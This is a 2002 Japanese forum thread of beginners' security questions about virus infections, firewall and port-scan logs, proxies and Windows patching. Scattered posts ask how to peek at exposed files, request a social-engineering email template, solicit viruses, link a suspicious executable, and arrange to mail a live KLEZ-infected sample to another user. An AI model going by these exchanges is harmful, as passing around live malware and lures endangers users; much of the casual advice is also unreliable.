パーミッション777のファイルってどうすれば
外部からのぞけるの?
>>242 >>244
信用できると思う。
単にほとんどのメールアドレスが「割り出せませんでした」と表示されるだけで(W
>>246
なるほど。そーゆーオチですか(笑
きしょい趣味の馬鹿野郎どもがいっぱい釣られてそうだな。w
>>245
ブラウザで見ろや スレ立てんなヴォケ
777のファイルなんか作るな
>>244
今は知らんが、3年くらい前はアンケートとかプレゼントとかのメール送ると結構つれたぞ。
>>250
文章のフォーマットを教えてください。
私はアフォなので、うまい文章がかけません。

ソーシャルハックっていうのでしょうか?そういうの。
>>251

            ノ ‐─┬       /
          ,イ  囗. |      / _ 丿丿
            |    __|    ―ナ′
                     /  ‐' ̄
              ,‐       /
            ナ' ̄       /   、___
     /      ノ`‐、_
    / _ 丿丿  _メ       | _/
  ―ナ′     〈__         X / ̄\
   /  ‐' ̄               / V   /
   /       \   l       レ ' `‐ ノ
  /   、___  Χ ̄ ̄〉
             \ 丿       /
              \          / _
                    ―ナ′__
     | _/       ̄ ̄〉     /   ,
    X / ̄\       ノ     /  _|
   / V   /             /  く_/`ヽ
   レ ' `‐ ノ  ―――'フ
              / ̄      ┼┐┬┐
               |          〈 /  V
              `−      乂   人

             ┼‐      |  ―┼‐
             ┼‐       |    |
             {__)      |   _|
                        |  く_/`ヽ
253251:02/03/01 00:06
>>252さん、どうもありがとうございます。
参考にさせていただきます。
>253
大人だなぁ
255 :02/03/01 01:38
  
256名無しさん@お腹いっぱい。:02/03/01 02:25
>>229じゃないけど俺のところにも
何かがアクセスしてきている?ようだ。
FWはゾーンアラーム。
気になるのなぜかきっちり3分おきにアクセスしてきていること。
(1,2秒の誤差はあるが)この点からどうも手動ではないみたいだが…
そのIPは207.161.69.222で、調べたらカナダかららしいが
どういうことなんでしょう?
MXで3分おきにリトライされてるとか?
>>257
MXはPCを起動してから立ち上げてないし
ほぼきっちり3分おきなので手動ではないようです。
207.161.69.222 (TCP Port 4152) [TCP Flags: S]
            ちなみに↑のポート番号がどんどん大きくなってる。
これのまえは4095、その前は4034でした。
向こう側のプロバイダの回線の仕様で無意識に俺のPCを叩いていってる
っていうことなら問題ないんでしょうが…
>>258
ポートスキャンで順番にノックしてるんじゃない?
なんか、連続でドア叩くと不正アクセスとか、マークされるんで、
間隔あけてるとか。
260名無しさん@お腹いっぱい。:02/03/01 04:28
ウイルスチェックしたら、2つのフォルダが感染していました。
どちらも同じウイルスで、IEのホームを勝手に書き換えたり、
海外のアダルトサイトを【お気に入り】に追加してしまうというものです。

とりあえず、感染していたフォルダを削除しましたが、
これでOKなのでしょうか??

本当にくだらない質問ですが、
セキュリティの知識が疎いので、どなたかお教えください。
>>260
ウイルス名ぐらい書け。
262免罪符:02/03/01 11:57
接続速度の
ホスト1 WebArena(NTTPC) 4.60Mbps(1764kB,6.3秒)
ホスト2 at-link(C&W IDC) 5.2Mbps(2244kB,3.6秒)
で、Mbpsとkbの違いを教えてください
263冤罪符:02/03/01 12:19
板違い
上がり速度下り速度
265厨房:02/03/01 13:08
いくつかの質問があります。
W2Kでインターネット接続共有しています。
ホストPCはカードモデムでインターネット接続
クライアント側とは有線LAN接続です
質問1
ホストPCのFWとしてNISとBID
クライアントPCにはNISだけ
で、クライアントPCにNISを入れて意味はあるのでしょうか?
質問2
ホストPCは直接インターネットに接続しているので、
ある程度侵入などのリスクはやむおえないと考えています。
しかしクライアントPCはなるべく安全性を高めたいと思っています。
そこでホストとクライアントの間にルーターを入れたらどうなるでしょうか?
なるべく低予算でクライアント側の安全性を高めたいと考えています。
2万円でクライアント側の安全性が100倍になるならそれでもよし
10万円で1万倍になるならそれでもよし。
と考えています。
(どんな計算なんじゃ!ゴルァ!ネットに繋ぐなゴルァ!!って突っ込みは無しで・・・)

ということで皆さんのご教授をお待ちしています。
266konn:02/03/01 13:16
ウイルスヨロシク。 takachan21hotmail.com
267260:02/03/01 14:02
260です。

>>261
ウイルス名は、JS_EXCEPTION.GENです。
トレンドマイクロ社のサイトでチェックしました。
>>266
逮捕!
269名無しさん@お腹いっぱい。:02/03/01 14:27
ウィルスに感染してると思うんだけど
スキャンしてもでてこない。

最近おかしいなって思う症状は・・・・

・スキャンディスクができない(他のプログラムが書き込み中で再試行しまくり
・アイコンが変わった(なんか気持ち悪い・・。
・以前、変なメールを受けとったことがある(添付もあった・・・。
270名無しさん@お腹いっぱい。:02/03/01 14:50
ノートン先生から
「Backdoor/SubSeven トロイの木馬」
を遮断しましたって警告が出てるんだけど・・・
これってウイルスに感染してるんですか?
一応スキャンかけても出てこないんだけど精神衛生上よくないんで
誰かトロイについて詳しい方教えれ
271名無しさん@お腹いっぱい。:02/03/01 14:56
感染してないよ・・それは。
>>270
感染を遮断してくれたんだから、ノートン先生に感謝してください。
273名無しさん@お腹いっぱい。:02/03/01 15:03
そういえばノートンにプロフェッショナル版とかゆう新製品が今日
発売されるんだよね、機能がノートン2002版よりアップしたん
だとか、IDS機能・ネット使用制限機能・アカウント機能・ウェブ
コンテンツフィルタリング機能・Palm OS対応ウイルス対策機能が
追加されたんだって、その反面保護者機能が削除されたみたいだ。
http://www.symantec.co.jp/region/jp/products/nisproducts/

274270:02/03/01 15:08
>>271
>>272
レスサンクスでし(。・_・)ノ
感染してないのかぁ・・・(ホッ)
無理してノートンさん買ったかいがありました。
それにしても1時間置きにに攻撃してくるんですけど
もしかして狙われてるのかな(汗)
>>265
2kのインターネット接続共有使ってないからわからんのだけど、
静的IPマスカレードがされていないならルータをはさんでも同じかと思う。
あと、ホストPCにある程度侵入は仕方ない、という考え方はやめろ、みなが迷惑する。

LANー>インターネットの経路でデータが漏れるのを防ぐためには(トロイとかね)、
ホストPCでプロキシサーバーを立てて、インターネット接続共有をやめる、という手もあるかとおもう
ノートンあれば平気だと思うけどね。サーバーの立て方がわからないなら、忘れてください。

NISはノートンインターネットセキュリティだとして、BIDは何?
いちお用語辞典とグーグルしらべたんだけどね、わけわからん略語勘弁して。
>>265
インターネット接続の共有を使っている環境においても、
クライアントに Norton Internet Security を入れる意味はあると思います。
説明書にも
「トロイの木馬などのアウトバウンド接続を開始するアプリケーションから
 保護するには、各コンピュータにインストールする必要があります」
と記述があります。
277B:02/03/01 18:13
>>275
回答ありがとうございます
>ホストPCにある程度侵入は仕方ない、という考え方はやめろ、みなが迷惑する。
えっとですね・・・侵入された疑いがあればすぐにフォーマットできるようにしておく
重要なファイルは置かない、という意味であり、侵入をほったらかしにするという事ではありません・・・

>ホストPCでプロキシサーバーを立てて、・・・
>ノートンあれば平気だと思うけどね。
で、実際のところプロキシ立てた場合とノートンに任せた場合の安全性にどの程度の差があるのか?
ということも含めて教えていただきたいんですが。
プロキシ立てたほうが絶対安全性は高くなるというお話であればそれでもいいかと・・・

BIDはブラックアイス・デフェンダーの略でした・・・
一般的に結構使われているのでこれでいいかと思いましたが・・・申し訳ないです

>>276
そうでした・・
私もレス後に馬鹿な事質問してしまったと懺悔しております
278厨房:02/03/01 18:15
277はBじゃなくて厨房です
279cheshire-cat:02/03/01 19:52
>>277
横レスだけどさ、2kちゃんと設定してる?
どうぞ。

Microsoft Personal Security Adviser
http://www.microsoft.com/technet/mpsa/start.asp
プロクシ
ほぼ例外なくHTTPしか中継できない(webサーフ、FTP位)
プロクシに対応しているクライアントが必要
webキャッシュのサーバ一括管理
データの中身に対してフィルタリングできる
負荷が高い(相対的に)
設定次第では不正中継の温床になる
パケットフィルターと併用すると効果が大きい
設定が面倒(相対的に)

NAT/NAPT
大抵のものは何でも通る
プロトコル次第では不都合が出る(やや厄介)
負荷が低い(相対的に)
パケットフィルターと併用しても効果が小さい(それでも必要)
設定が簡単(相対的に)
281 :02/03/01 20:04
>>280
man in the middle
282厨房:02/03/01 23:31
>>279
こんな風になってました
IE / Outlook Zones Versions and Settings relating to Internet Explorer and Outlook
黄色三角
Local Account Test 3 account(s) were tested, 3 issue(s) were found.
黄色三角
Unusual Administrators Make sure this user is a proper Administrator on your computer.
〇i
Shares 2 share(s) present on your computer.
〇i

他は〇緑です
283名無しさん@お腹いっぱい。:02/03/03 03:03
2ちゃん見てるとたまにでかい空白が表示されます。
変ですか?直りますか?
ブラウザはIE6でアナログ回線のダイヤルアップ接続です。
284nanasi:02/03/03 03:09
ゾーンアラームではよくアタックがあったのに
ウイルスバスターで全然アタックがない気がするんですけど
これはやばいんですかね?それともよいことなんですか?
285283:02/03/03 03:18
初心者板逝きます・・・
286名無しさん@お腹いっぱい。:02/03/03 03:57
>>284
えっと、ここんとこ静かだからです ( ´Д`)
287名無しさん@お腹いっぱい。:02/03/03 04:33
WinMXのChimeのイベントビューアを見ると
GET・・・ってところから連休入ってるんですけど、やばいんすか?
288 :02/03/03 06:10
289名無しさん@お腹いっぱい。:02/03/03 06:15
Hotmailの受信トレイからブックマークで跳んだ先が
リファラー取ってるサイトだと勝手にメールを読まれたりするんですか?
290 :02/03/03 06:36
>>289
しない
291 :02/03/03 06:48
自分のパソコンがのぞかれてるって事が分かる方法ありますか?
>>291
後ろを見ればいいんじゃないか?
293名無しさん@お腹いっぱい。:02/03/03 06:54
>290
あの長いURLをコピペして何かいじったらIDとかばれるのかと思ったよ。
とりあえず安心した。レスさんくす。
インターネットマンションとやらの無料LAN接続をしたら、どうやらDHCPも
なしで固定のグローバルIPが割り当てられているみたいなんだけど、これって
大丈夫なのかな?あんまりこういうところ(藁)に書き込んだりしないほうがイイの?
295 :02/03/03 08:18
>>294
大丈夫って何が?
>>294とりあえずルータを買ってみそ、とか言ってみる。
297 ◆WWF/lJfE :02/03/03 20:50
PE-SPACES.1445というウィルスに感染してしまいました。
Protector Plus 2000という海外のソフトの体験版で、
ある程度は駆除できたんですが、
Windows上では、WindowsフォルダのなかのSYSTEM MEMORYや
EXPLORERに付いたこのウィルスを駆除できず、困っています。

このウィルスをDOSモードで駆除するソフトをトレンドマイクロのサイトから
ダウンロードしてみても、ウィルスのせいで起動してくれず、
目茶苦茶困ってます。

なんとかする方法があれば、教えて下さい・・・
298???:02/03/03 20:53
オンラインすきゃん

http://www.trendmicro.co.jp/hcall/scan.htm
299 ◆WWF/lJfE :02/03/03 20:56
>>298
どうも。
それも何回か試してみて、削除出来る(していい)ファイルは
片っ端から削除したんですけど、
使用中のファイルは駆除出来ないんですよね。
>299
再起動してから、そのファイルを削除してみれば
( ´_ゝ`)
>>297
HDDをまるまるフォーマットしてOSを再インストール
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_SPACES.1445
303 :02/03/04 03:01
 
まんまるちゃん
まんまるちゃん
まんま〜るちゃん
304 は壊れてます
>>305
みれば分かります。
307_:02/03/04 05:26
>>297
OSをもう一個入れて、そちら側から起動してないOS側をチェックしたら。
308名無しさん@お腹いっぱい。:02/03/04 12:03
ダウンロードしちゃいけないファイルってどこで情報を得ればよいの?
>>308
ダウソ板
310名無しさん@お腹いっぱい。:02/03/04 16:15
WinでIEを使用しているのですが
インターネットオプション→セキュリティーを開こうとすると
どうしても強制終了してしまいます。
ウイルスにやられてるのでしょうか。
311 :02/03/04 18:23
>>310
IEが壊れている 修復しな
312名無しさん@お腹いっぱい。:02/03/04 23:21
おなかが痛くなったんですけど、どうしたらいいでしょうか?
>>312
朝顔の種を煎じて飲む
>>313
チョウセン朝顔だったら飛ぶか死ぬ。w
315名無しさん@お腹いっぱい。:02/03/05 00:34
>313
では、取り敢えず夏まで我慢します。
316くだらなくてすまそ。:02/03/05 15:37
この質問はココでいいのかなぁ?
I.E5.5の検索が接続先で書き換えられたっぽくて広告ポップアップが
出る上、単一検索サービスに繋がらなくなってしまったみたい。
で、出てくるポップアップは二個で片方は自動的に消えるのですが
もう一方の奴はデスクトップに残ります。
そいつの接続先は→216.65.101.134/gambling/index2.htm
これらの障害を取り除いて検索サービスを再び使えるようにしたいので
アドバイスおながいします。
317名無しさん@お腹いっぱい。:02/03/05 17:21
ネットに繋ぐたびにnimdaまみれになりますがどうすればいいんでしょうか
駆除ツールもあらゆるのを試した挙句、日曜に全ドライブフォーマット
+OS再インストール(win2k)+IE6インストール
これで大丈夫ってんで、2chと少々。そんでもってオンラインウイルス検索にいったらnimdaだらけ
なにをすればいいんでしょう
>>316
その検索ってツールバーにある検索のこと?
319 :02/03/05 18:09
>>317
オンラインチェックなんかに頼っているからだろ
対策ソフト買えよ
>>317
WindowsUpdateをしてセキュリティホールをふさがないと。
駆除ツールがおいてあるサイトをよくみれば詳しく書いてあるんじゃないかな
321名無しさん@お腹いっぱい。:02/03/05 18:49
ファイヤーウォールのSygateをインストールしようと思うのですが
PGPファイヤーウォールをアンインストールしろとようなことがでてインストール
できません。どうしたらできますか?
322名無しさん@お腹いっぱい。:02/03/05 19:08
>>321
俺は分からないんだけど、ここの方がいいのでは?
http://pc.2ch.net/test/read.cgi/sec/993936202/
323名無しさん@お腹いっぱい。:02/03/05 19:11
>>316
とりあえず下記など参考に。
http://homepage2.nifty.com/winfaq/c/ietrouble.html#370
http://www.zdnet.co.jp/help/howto/security/p04/index.html
http://www.zdnet.co.jp/news/0102/26/e_hijack.html
アンチウイルスソフトの購入など考える方がいいかも。
>>317のNimdaだらけってのは
感染してるのか、htmlを拾ってるだけなのか
どこのフォルダから見つかるとか書かないと
わからないよ。
325cheshire-cat:02/03/05 20:00
IISが入っているのかどうか書いて欲しかった。
Win2kSP2を丸ごとDLするのは、ここ。100MBくらいだけど。
http://a129.ms.a.microsoft.com/f/129/1611/2h/download.microsoft.com/download/win2000platform/SP-x86/SP2/NT5/JA/W2KSP2.exe
326317:02/03/05 20:23
>>320
お勧めのとおり今とりあえずめぼしいupdateは全部やってみました。
しばらく様子を見たいと思います・・

>>324
temp,system32とかが多いです
>>325
IIS4.0だか5.0だかです・・なるほろ
328cheshire-cat:02/03/05 20:45
>>327
ひょっとして、IISを停止せず生きている時にSP2当てようとしてた?
停止も何も考えずに当てちゃいました
330cheshire-cat:02/03/05 20:49
>>329
なら100MBのを落として、LANに接続しないでOSインストールしてSP2当てれば解決だね。
・・やっぱもう一回再インストールしたほうがいいですか?
332cheshire-cat:02/03/05 20:58
>>331
自信が無いなら、やったほうがいいんじゃないの?
「やばいかも」、なんてビクビクしながら使うのって、嫌でしょ?
Windows2000SP2導入までLANに繋がないということで。

あ、SP2導入後にWindows2000SRP1入れた方がいいよ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/news/w2ksrp1.asp
うーん・・そうですね。そうします
色々ありがとうございました!
334cheshire-cat:02/03/05 21:05
おまけ。
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/itsolutions/security/tools/mpsa.asp

管理共有とか匿名ログオン、切ってる?使ってちょ。
335名無しさん@お腹いっぱい。:02/03/05 21:07
テスト用のウィルスの構文みたいなの
2ちゃんでよくコピペしてあったけど、よかったら貼ってください。
336cheshire-cat:02/03/05 21:09
337cheshire-cat:02/03/05 21:17
独り言のようなものだけど。
Aliz.Aってさ、ファイル改変とかレジへのキー書き込みしないでしょ。
だから、「テスト用」にはもってこいだよね、NIC抜いていれば。
でもあまりにも評判悪いんで、挫折。
338335:02/03/05 21:18
>>336
うわぁ〜、ありがとうございます。
Severe Riskばっかりでした・・ココでちょっと勉強しなおします
340XPな疑問:02/03/05 23:11
XPネタって遅い気もするんだけどね。
XPってさ、ライセンス認証がすごい!っていってたのに。
哀れ、ライセンス認証しなくてもライセンス取得している困った人が
たくさんいるんだよね。
そこで、僕思ったんだけどWinアップデートの時とかってライセンスの
確認しないの?
わざわざ「この状態では情報は送信されません」とかでるから、その
後にそういう風にしてるのかと思ってたんだけど。
まさにXPをインストールして最初のライセンスさえクリアすれば後は
楽勝ってわけだったらあんまり意味ないよね(−−;
知ってる人お願いしマース。
341 :02/03/05 23:15
>>340
いたちごっこってことよ
342cheshire-cat:02/03/05 23:28
>>340
当然チェックしていると思うよ。
でもプロバ経由はさ、追跡面倒だろうから、大学とか企業とか官公庁狙いなんじゃないの、Adobeみたいに。
ちなみに再インストール後の面倒を避けるのは、これ。
http://www.zdnet.co.jp/help/tips/windows/w0424.html
344名無しさん@お腹いっぱい。:02/03/06 00:41
ちょっと前から友人の薦めでBlackICEを使っているんですが、
なんか今日に限って、BlackICE反応しまくり。
90分で約1000回も攻撃してくるんで、もうピーピー鳴りまくりなんです。
一つのところからじゃなくて、4つぐらいから続けてきます。
「侵入者を遮断」しても、すぐ別のから攻撃しかけてきて、
一応全部ブロックしているみたいなんですけど、なんとかなりませんか?
ちょっとビビってます。

345cheshire-cat:02/03/06 00:44
>>344
LocalとRemoteのポートとプロトコルくらいは書いてくれないと、誰も何も書けない。
>>344
_■■■BlackICEスレ 2■■■_
http://pc.2ch.net/test/read.cgi/sec/1012458984/150
>>344
WinMXやっててPingが・・・・・
なんて落ちじゃないよね?
348名無しさん@お腹いっぱい。:02/03/06 15:56
 
349じょ:02/03/06 16:22
何で皆
マカフィーを入れないのかが不思議でしょうがない・・

先生も虫退治も使いにくいしアップデートめんどいじゃん!
350                :02/03/06 16:23
今208.11.233.192に
攻撃しかけられてるんだけど・・・
351 ◆enghYAOw :02/03/06 17:12
友人から「A humor game」という題でメールが送られてきました。
英文で「これは私が作った最初のゲームで・・・」という内容で
添付にインストーラーとHTMLファイルが入っていました。

前まで、英文は怪しいので直に削除していましたが
その友人は英語のメールをたまに送ってきていたので、疑いながらも
「あ〜、ゲーム作ったのか〜凄いな〜」
と思いつつクリックしました。
でも何も起こりませんでした。
「おかしいなウィルスかな」
と思って、もう一つのHTMLファイルを開くとブラクラでした…

恐る恐る再起動してみると、壁紙が表示されません。
他の画像、動画ファイルを開こうとしましたが開けませんでした。
「A bone」も正常に起動しないし、なんだかさっきから重くてたまりません。

どうすればいいんでしょうか・・・
>>351 今すぐ回線切ってクリーンインストール!
353名無しさん@お腹いっぱい。:02/03/06 17:24
>351
んでウイルスチェクの結果は?
ソフト無いならダッシュで電気屋へGO!
354 ◆enghYAOw :02/03/06 17:57
オンラインウィルスチェック試してみたけど、なんかかってにウィンドウ閉じちゃうんですよ。
やっぱアンチウィルスソフト買わなきゃダメですかねぇ?
355名無しさん@お腹いっぱい。:02/03/06 18:02
>なんかかってにウィンドウ閉じちゃうんですよ。
なんかウィルスに感染してる可能性ありそうだね。ウィルスチェックサイトへの
アクセス妨害するウィルスもあるからねえ。
すぐにアンチウィルス買いに行ったほうがいいぞ!
>>351
あなた100%感染してますよ
357cheshire-cat:02/03/06 18:17
>>351
OS何?
358名無しさん@お腹いっぱい。:02/03/06 18:35
351は逝ってしまったか。アンチウィルス買いに行ってるのならよいが…
359cheshire-cat:02/03/06 18:56
>>358
351の人って、実行ファイルがいくつか逝っちゃってるよね、なんだか。
360名無しさん@お腹いっぱい。:02/03/06 20:57
おーい・・・


http://watch.impress.co.jp/internet/www/article/2002/0306/klez.htm

これか?ちなみにAntiVirのサイト内を検索したけどklezなんてどこにも書いてない。大丈夫かな?
362名無しさん@お腹いっぱい。:02/03/06 21:12
>>362

AntiVirは対応できてるのかなと、ちょっと気になってつぶやいただけですよ。
364cheshire-cat:02/03/06 21:30
Klezじゃないような気がする。
humorで検索するとBadtrans.BとPlageがヒットするけど、それでもなさそう。
推測だけどね。
351はどうしたのかなぁ…
366cheshire-cat:02/03/06 22:00
>>365
EXE破損してそうだから、アンチウイルスソフトまともに起動できるのかなぁ?
今ごろOSも起動していない可能性高いね・・・
このスレは351追悼スレになりました。
帰ってこれるかなあ。
南無阿弥陀仏。
帰ってこ〜いよ〜
370351 ◆enghYAOw :02/03/06 23:14
ども…生きてますよ。
OSはWINMEです。MEのシステム復元とかいろいろ試してみたけどダメでした…

ゎぁぁ、どないしよ〜
371cheshire-cat:02/03/06 23:16
>>370
メールの件名と本文と添付ファイル名が知りたい〜
372351 ◆enghYAOw :02/03/06 23:23
>>371
件名は「A humor game」で
本文は
This is a humour game
This game is my first work.
You're the first player.
I wish you would like it.
でした。
あと、添付は「install.exe」と「mose[1].htm」でした。
htmのほうは、説明書かなと思ってinstall.exeを起動した後で開いてみると
「メッセージの作成」ウィンドウが何個も表示されるブラクラでした。

メールの送信元(友人)にとりあえず状況を説明して、
他の人に同じようなメールが行ってないか確認しました。
だけど>>361
さんの情報を読んでみると、どうやら自分のアドレス張からランダムに
選ばれるらしいのでムダだったようです。

ぅゎぁぁ
>351 とりあえずアンチウィルスソフトで検出結果を教えてくれー
374cheshire-cat:02/03/06 23:31
>>372
該当するの、見つからないね。
アンチウイルスで検出した名前が知りたい。

とりあえずゴミがよく放り込まれるところ
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_LOCAL_MACHINE \Software \Microsoft \Windows \CurrentVersion \Run*
HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Run
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce

<ファイル名を指定して実行→msconfigでチェック>
システム設定ファイル「Win.ini」のwindowsセクションにある、「load=」と「run=」の項目
「System.ini」内の「shell=」の項目
「Autoexec.bat」
375351 ◆enghYAOw :02/03/06 23:31
アンチウィルスソフト持ってません…(泣
しかもオンラインウィルスチェックも、ウィルスに妨害されてかできません。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.A
↑でも症状とかからこれの可能性が高い?かも。
>>375 亜種がたくさんあるので症状からは断定できません。回線繋いでないで
早くアンチウィルス買えー!ゴルァ
377cheshire-cat:02/03/06 23:36
KLEZならさ、詳細情報でファイル名やレジストリのサブキー書いてるよね。
見つからない?
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3250KLEZ.htm
378cheshire-cat:02/03/06 23:40
要は、レジストリの自動実行のサブキーに書かれているファイル名を検索して、その後googleで検索すればいいんだよね。
379351 ◆enghYAOw :02/03/06 23:40
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3288
ここのソフト使ってみました。そしたら、HDDのノイズが消えました。
再起動して確かめてみます。
380cheshire-cat:02/03/06 23:44
KLEZの変種か亜種だったんだね。
あ、もらっておけばよかった(鬱
351 応答せよ!
382351 ◆enghYAOw :02/03/06 23:49
う〜ん。再起動したけどやっぱりダメでした・・・
さっきのツール起動するとノイズは収まるんですけど…
やっぱアンチウィルス買うべきか…
前からいると思ってましたし明日見てくることにします。
ご協力ありがとうございました〜〜!!

また困ったことがあったらよろしくお願いしますね〜(藁
>>cheshire-catさん
まだ残ってますよ〜。いります?(笑
383cheshire-cat:02/03/06 23:52
>>382
送ってちょ。

レジストリのサブキー、自分のに感染させて遊びながら調べてみます、週末に。
結局お力になれずスマソ。
384名無しさん@お腹いっぱい。:02/03/06 23:57
@mb.infoweb.ne.jp
からウィルス メールがきたんですけど 捨てアドなんですか?教えてください
385351 ◆enghYAOw :02/03/06 23:58
贈りました。(×送り)
OutLookだと見ただけで感染しちゃうとかしないとか…
その辺のことはよく分かりませんが気をつけてください。

それでは寝ます。
オヤスミ〜(-Д-)Zzz...
>351 明日アンチウィルス買ってウィルス名わかったら報告してね。
387名無しさん@お腹いっぱい。:02/03/07 00:00
これもウイルスといってよいですか?
http://64.71.32.81/ERODIGITAL/erox.exe
388351 ◆enghYAOw :02/03/07 00:00
>>384
ぜんぜん捨てアドじゃないっすよ。@niftyの過去形みたいなもんです。
会員しか持ってないアドレスですよ。
389名無しさん@お腹いっぱい。:02/03/07 00:06
>>388
ってことは調べてもらえば住所とかわかるんですよね?どうすればいいんでしょう?
351さん教えてください
>>389
簡単そうに言うなよw
相手の住所だぞ!?
391>>389:02/03/07 00:37
民事訴訟を起こすために必要だと“証拠書類をそろえて”niftyに言えば?
他の理由じゃ無理だから。
392名無しさん@お腹いっぱい。:02/03/07 00:57
>>384
「@mb.infoweb.ne.jp」は
昔、富士通が「Infoweb」というプロバイダをやっていた頃に
会員が使っていた物です。
ただ、そのメアドからメールが届いたからと言って、
そのメアドが実在するとは限らないし、
実在したとしてもその所有者がメールを送ったとは限りません。
ウィルス送るのにわざわざ自分のメアドを晒すヤツなんていませんからね。

>>391
プライバシーの問題があるから個人で依頼しても無理。
警察とか弁護士にやらせないと。
393名無しさん@お腹いっぱい。:02/03/07 01:31
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.209.198.0-61.209.199.0
b. [ネットワーク名] HAKO-NET
f. [組織名] 株式会社ニューメディア
g. [Organization] Newmedia Co.,Ltd
m. [運用責任者] KS7400JP
n. [技術連絡担当者] KS7400JP
p. [ネームサーバ] dns3.odn.ne.jp
p. [ネームサーバ] ns.ncv.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/07/10
[返却年月日] 2002/04/30
[最終更新] 2002/01/23 10:03:18 (JST)
[email protected]

odnと記載されてる所があるんですが、どういう事なのでしょうか?
何の話だ?
395名無しさん@お腹いっぱい。:02/03/07 16:30
 
>>393
odnの奴がHAKO-NETを踏み台にしてんじゃないの?
397cheshire-cat:02/03/07 21:10
 調べたら、検出名はKLEZ.Eでした。
 サブキーがちょい違うような。
398くだらねぇ質問です:02/03/07 22:32
ADSLでPCがデータのやり取りしていないときでも、
モデムのDATAランプが点灯するときって何なのでしょうか?
(ルーターとZoneAlarm使っています)
なーんか、気になってしまうのですが・・・
>>393
意味もわからずwhoisするな

>>396
意味もわからずいいかげんな事、答えるな。
>>399
じゃ、あんたが答えるよろし。
http://www.japan-telecom.co.jp/PRdept/news/n980316.html
http://www.ncv-y.co.jp/biz_about.html

ほんとにくだらねぇな。つか、板違いだな。
>>401
意外にいい人だね。
 
404名無しさん@お腹いっぱい。:02/03/08 11:39
どなたか教えてください。
2chの板の書き込みから、IPがわかるものなのでしょうか?
そういうプロがいると聞いたのですが・・・
ZoneAlarmのログです。
これってポートスキャンなんでしょうか?

FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:5845,202.223.100.104:139,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:5971,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6241,202.223.100.104:139,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6290,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6344,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:6803,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7172,202.223.100.104:139,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7174,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:35 +9:00 GMT,210.143.99.143:7180,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7235,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7236,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7239,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7244,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7298,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7299,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:36 +9:00 GMT,210.143.99.143:7300,202.223.100.104:139,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7301,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7303,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7360,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7417,202.223.100.104:139,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7421,202.223.100.104:138,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7423,202.223.100.104:137,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7483,202.223.100.104:445,TCP (flags:S)
FWIN,2002/03/06,21:17:37 +9:00 GMT,210.143.99.143:7538,202.223.100.104:139,TCP (flags:S)
>>405って、ログコピペ厨ですか?初心者質問でごめんなさい。
Hotmail Account Temporarily Unavailable


We apologize, but your account is temporarily unavailable.
This delay does not affect the entire site or relate specifically
to your account, but the machine that holds your account information
is temporarily unavailable. We do not expect this delay to last much longer,
so please continue to check our site for your account status.
We will do our best to make your account available as quickly as possible.
We appreciate your support, and sincerely apologize for the inconvenience.
ActiveX 切るJava切るってインターネットオプションのセキュリティ設定の
どの部分を切ればいいんですか?
>>408
ActiveXとJava。
411ナナシアター.swf:02/03/08 20:06
このごろ頻繁に「IEがエラーを起こしましたうんぬん」とウインドウが出て
ブラウザが強制終了されてしまうのですが、ウイルスのしわざではありませんか??
412 :02/03/08 20:10
>>411
そう思うんだったらウイルスチェックしろって

関係ないだろうけど
>>411
正直、それ聞かされただけじゃ何とも言えん。
414ナナシアター.swf:02/03/08 20:19
レスありがとうございます。
IEのバージョンは5.0、OSはWIN2000です。
ウィルスチェックは、ソフトを持っていないんで、無料のサービスを
利用して確認しましたが、何も検出されませんでした。
>414
ソフトを持っていないのなら問題外。
今すぐ買って来い。

そしてIEの再インストール。」その後パッチを当てるのを忘れずに。
416名無しさん@お腹いっぱい。:02/03/08 22:53
ぷちサーバ管理者です
セキュリティをかけてないディレクトリにある画像ファイルを
